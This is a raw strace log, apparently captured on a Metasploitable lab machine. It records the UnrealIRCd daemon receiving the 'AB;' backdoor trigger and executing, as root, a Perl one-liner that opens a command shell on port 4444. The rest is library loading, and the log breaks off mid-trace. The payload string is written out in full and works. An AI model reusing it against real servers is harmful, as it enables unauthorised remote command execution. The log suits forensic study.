4519  07:42:12.683577 select(1024, [2 3 4 7 9], [], NULL, {0, 280000}) = 1 (in [2], left {0, 100000})

4519  07:42:12.861883 clock_gettime(CLOCK_MONOTONIC, {2942, 678933450}) = 0

4519  07:42:12.861935 accept(2, 0, NULL) = 6

4519  07:42:12.861958 getpeername(6, {sa_family=AF_INET, sin_port=htons(32913), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:42:12.861993 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:42:12.862006 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:42:12.862019 setsockopt(6, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:42:12.862031 setsockopt(6, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:42:12.862043 setsockopt(6, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:42:12.862054 getsockopt(6, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:42:12.862068 setsockopt(6, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:42:12.862085 clock_gettime(CLOCK_MONOTONIC, {2942, 679099331}) = 0

4519  07:42:12.862098 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 8

4519  07:42:12.862110 fcntl64(8, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:42:12.862120 fcntl64(8, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:42:12.862129 fcntl64(8, F_SETFD, FD_CLOEXEC) = 0

4519  07:42:12.862139 connect(8, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:42:12.862155 send(8, "\273N\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:42:12.862232 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:42:12.862256 gettimeofday({1495626132, 862261}, NULL) = 0

4519  07:42:12.862284 select(1024, [2 3 4 5 7 8 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:42:12.862328 clock_gettime(CLOCK_MONOTONIC, {2942, 679341323}) = 0

4519  07:42:12.862340 recv(5, 0x80b7ec0, 8192, 0) = -1 ECONNRESET (Connection reset by peer)

4519  07:42:12.862354 getsockopt(5, SOL_SOCKET, SO_ERROR, [0], [4]) = 0

4519  07:42:12.862377 send(5, "ERROR :Closing Link: [10.0.2.4] (Connection reset by peer)\r\n", 60, 0) = -1 EPIPE (Broken pipe)

4519  07:42:12.862394 --- SIGPIPE (Broken pipe) @ 0 (0) ---

4519  07:42:12.862497 close(5)          = 0

4519  07:42:12.862518 send(6, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:42:12.862583 time(NULL)        = 1495626132

4519  07:42:12.862597 time(NULL)        = 1495626132

4519  07:42:12.862628 gettimeofday({1495626132, 862652}, NULL) = 0

4519  07:42:12.862660 select(1024, [2 8], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:42:12.862747 clock_gettime(CLOCK_MONOTONIC, {2942, 679761406}) = 0

4519  07:42:12.862759 gettimeofday({1495626132, 862763}, NULL) = 0

4519  07:42:12.862770 select(1024, [2 3 4 7 8 9], [], NULL, {1, 0}) = 1 (in [8], left {1, 0})

4519  07:42:12.865632 clock_gettime(CLOCK_MONOTONIC, {2942, 682647602}) = 0

4519  07:42:12.865647 recvfrom(8, "\273N\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0(\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:42:12.865707 close(8)          = 0

4519  07:42:12.865721 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:42:12.865735 send(6, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:42:12.865782 gettimeofday({1495626132, 865787}, NULL) = 0

4519  07:42:12.865795 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:42:12.865869 clock_gettime(CLOCK_MONOTONIC, {2942, 682882097}) = 0

4519  07:42:12.865910 recv(6, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:42:12.865963 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:42:12.865980 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:42:12.866001 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:42:12.866017 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12391

12391 07:42:12.866084 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

12391 07:42:12.866099 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

12391 07:42:12.866110 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12391 07:42:12.866123 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

12391 07:42:12.866229 brk(0)            = 0x80f9000

12391 07:42:12.866251 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12391 07:42:12.866266 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f41000

12391 07:42:12.866283 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12391 07:42:12.866301 open("/etc/ld.so.cache", O_RDONLY) = 1

12391 07:42:12.866314 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12391 07:42:12.866332 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f39000

12391 07:42:12.866342 close(1)          = 0

12391 07:42:12.866353 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12391 07:42:12.866368 open("/lib/libncurses.so.5", O_RDONLY) = 1

12391 07:42:12.866381 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

12391 07:42:12.866526 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

12391 07:42:12.866545 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f09000

12391 07:42:12.866558 mmap2(0xb7f36000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f36000

12391 07:42:12.866574 close(1)          = 0

12391 07:42:12.866586 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12391 07:42:12.866600 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12391 07:42:12.866615 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12391 07:42:12.866709 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12391 07:42:12.866726 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f05000

12391 07:42:12.866737 mmap2(0xb7f07000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f07000

12391 07:42:12.866753 close(1)          = 0

12391 07:42:12.866764 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12391 07:42:12.866777 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12391 07:42:12.866791 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12391 07:42:12.866880 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12391 07:42:12.866897 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f04000

12391 07:42:12.866940 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db5000

12391 07:42:12.866975 mmap2(0xb7efe000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7efe000

12391 07:42:12.866997 mmap2(0xb7f01000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f01000

12391 07:42:12.867012 close(1)          = 0

12391 07:42:12.867035 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db4000

12391 07:42:12.867047 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db46b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12391 07:42:12.867103 mprotect(0xb7efe000, 4096, PROT_READ) = 0

12391 07:42:12.867140 munmap(0xb7f39000, 29913) = 0

12391 07:42:12.867165 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12391 07:42:12.867179 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

12391 07:42:12.867199 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf85a210) = -1 ENOTTY (Inappropriate ioctl for device)

12391 07:42:12.867230 brk(0)            = 0x80f9000

12391 07:42:12.867239 brk(0x80fa000)    = 0x80fa000

12391 07:42:12.867251 brk(0x80fb000)    = 0x80fb000

12391 07:42:12.867267 getuid32()        = 0

12391 07:42:12.867277 getgid32()        = 0

12391 07:42:12.867286 geteuid32()       = 0

12391 07:42:12.867294 getegid32()       = 0

12391 07:42:12.867307 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12391 07:42:12.867321 time(NULL)        = 1495626132

12391 07:42:12.867333 brk(0x80fc000)    = 0x80fc000

12391 07:42:12.867348 brk(0x80fd000)    = 0x80fd000

12391 07:42:12.867367 open("/proc/meminfo", O_RDONLY) = 1

12391 07:42:12.867388 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

12391 07:42:12.867454 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f40000

12391 07:42:12.867475 read(1, "MemTotal:      1035240 kB\nMemFree:        322036 kB\nBuffers:         88048 kB\nCached:         464144 kB\nSwapCached:          0 kB\nActive:         257956 kB\nInactive:       423164 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        321796 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4332 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          52008 kB\nSlab:            20980 kB\nSReclaimable:    12144 kB\nSUnreclaim:       8836 kB\nPageTables:       1976 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

12391 07:42:12.867575 close(1)          = 0

12391 07:42:12.867586 munmap(0xb7f40000, 4096) = 0

12391 07:42:12.867600 brk(0x80fe000)    = 0x80fe000

12391 07:42:12.867629 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12391 07:42:12.867642 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12391 07:42:12.867654 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12391 07:42:12.867704 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12391 07:42:12.867716 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

12391 07:42:12.867728 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

12391 07:42:12.867742 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12391 07:42:12.867753 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12391 07:42:12.867766 uname({sys="Linux", node="metasploitable", ...}) = 0

12391 07:42:12.867814 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

12391 07:42:12.867832 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12391 07:42:12.867851 brk(0x8100000)    = 0x8100000

12391 07:42:12.867862 getcwd("/etc/unreal", 4096) = 12

12391 07:42:12.867876 getpid()          = 12391

12391 07:42:12.867892 getppid()         = 4519

12391 07:42:12.867934 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12391 07:42:12.867972 stat64("/sbin/sh", 0xbf85a1e8) = -1 ENOENT (No such file or directory)

12391 07:42:12.867985 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12391 07:42:12.868002 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12391 07:42:12.868026 socket(PF_FILE, SOCK_STREAM, 0) = 1

12391 07:42:12.868039 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12391 07:42:12.868051 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12391 07:42:12.868072 close(1)          = 0

12391 07:42:12.868084 socket(PF_FILE, SOCK_STREAM, 0) = 1

12391 07:42:12.868094 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12391 07:42:12.868104 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12391 07:42:12.868122 close(1)          = 0

12391 07:42:12.868135 open("/etc/nsswitch.conf", O_RDONLY) = 1

12391 07:42:12.868149 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

12391 07:42:12.868166 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f40000

12391 07:42:12.868177 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

12391 07:42:12.868226 read(1, "", 4096) = 0

12391 07:42:12.868236 close(1)          = 0

12391 07:42:12.868245 munmap(0xb7f40000, 4096) = 0

12391 07:42:12.868260 open("/etc/ld.so.cache", O_RDONLY) = 1

12391 07:42:12.868272 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12391 07:42:12.868292 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f39000

12391 07:42:12.868302 close(1)          = 0

12391 07:42:12.868312 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12391 07:42:12.868327 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

12391 07:42:12.868342 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

12391 07:42:12.868548 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

12391 07:42:12.868566 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dab000

12391 07:42:12.868579 mmap2(0xb7db2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7db2000

12391 07:42:12.868609 close(1)          = 0

12391 07:42:12.868621 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12391 07:42:12.868634 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

12391 07:42:12.868648 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

12391 07:42:12.868736 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

12391 07:42:12.868753 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d93000

12391 07:42:12.868764 mmap2(0xb7da7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7da7000

12391 07:42:12.868778 mmap2(0xb7da9000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7da9000

12391 07:42:12.868792 close(1)          = 0

12391 07:42:12.868819 munmap(0xb7f39000, 29913) = 0

12391 07:42:12.868835 open("/etc/ld.so.cache", O_RDONLY) = 1

12391 07:42:12.868848 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12391 07:42:12.868864 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f39000

12391 07:42:12.868874 close(1)          = 0

12391 07:42:12.868884 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12391 07:42:12.868898 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

12391 07:42:12.868916 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 